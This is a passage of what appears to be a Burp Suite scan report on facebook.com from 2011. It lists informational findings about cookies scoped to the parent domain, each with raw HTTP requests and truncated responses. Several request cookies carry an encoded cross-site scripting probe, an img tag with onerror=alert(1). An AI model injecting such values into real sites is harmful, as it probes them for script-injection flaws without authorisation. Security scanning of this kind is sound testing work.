Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.159.71
Connection: close
Date: Thu, 05 May 2011 11:41:50 GMT
Content-Length: 27242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.75. http://www.facebook.com/pages/create.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.28.109
Connection: close
Date: Thu, 05 May 2011 10:56:39 GMT
Content-Length: 32043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.76. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/memorial-high-school-west-new-york-nj/114508558584580

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/memorial-high-school-west-new-york-nj/114508558584580 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.53
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 27189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.77. http://www.facebook.com/patroyo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /patroyo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /patroyo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.144.31
Connection: close
Date: Thu, 05 May 2011 11:42:38 GMT
Content-Length: 48049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.78. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky%20-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky%20-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; wd=1022x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.187.63
X-Cnection: close
Date: Thu, 05 May 2011 11:56:54 GMT
Content-Length: 0


10.79. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.41
Connection: close
Date: Thu, 05 May 2011 11:43:07 GMT
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.80. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.157.53
X-Cnection: close
Date: Thu, 05 May 2011 11:56:56 GMT
Content-Length: 44258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.81. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan%20/100000824820783

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Bucky-Jordan%20/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Bucky-Jordan/100000824820783
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.104.59
X-Cnection: close
Date: Thu, 05 May 2011 11:39:24 GMT
Content-Length: 0


10.82. http://www.facebook.com/people/Bucky-Jordan/100000824820783  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • lsd=bYeMg; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /people/Bucky-Jordan/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bYeMg; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.110
X-Cnection: close
Date: Thu, 05 May 2011 02:50:59 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.83. http://www.facebook.com/policy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /policy.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /policy.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613620616%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613620617%2C%22act%22%2C1304613620616%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fpolicy.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C657%2C204%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.147.57
X-Cnection: close
Date: Thu, 05 May 2011 11:43:31 GMT
Content-Length: 58371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.84. http://www.facebook.com/privacy/explanation.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /privacy/explanation.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.53
Connection: close
Date: Thu, 05 May 2011 11:43:04 GMT
Content-Length: 27769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.85. http://www.facebook.com/profile.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profile.php?id=1708077046 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Roy-Chastain/1708077046
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.152.75
Connection: close
Date: Thu, 05 May 2011 11:42:14 GMT
Content-Length: 0


10.86. http://www.facebook.com/r.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.252.126
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 29390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.87. http://www.facebook.com/recover.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /recover.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
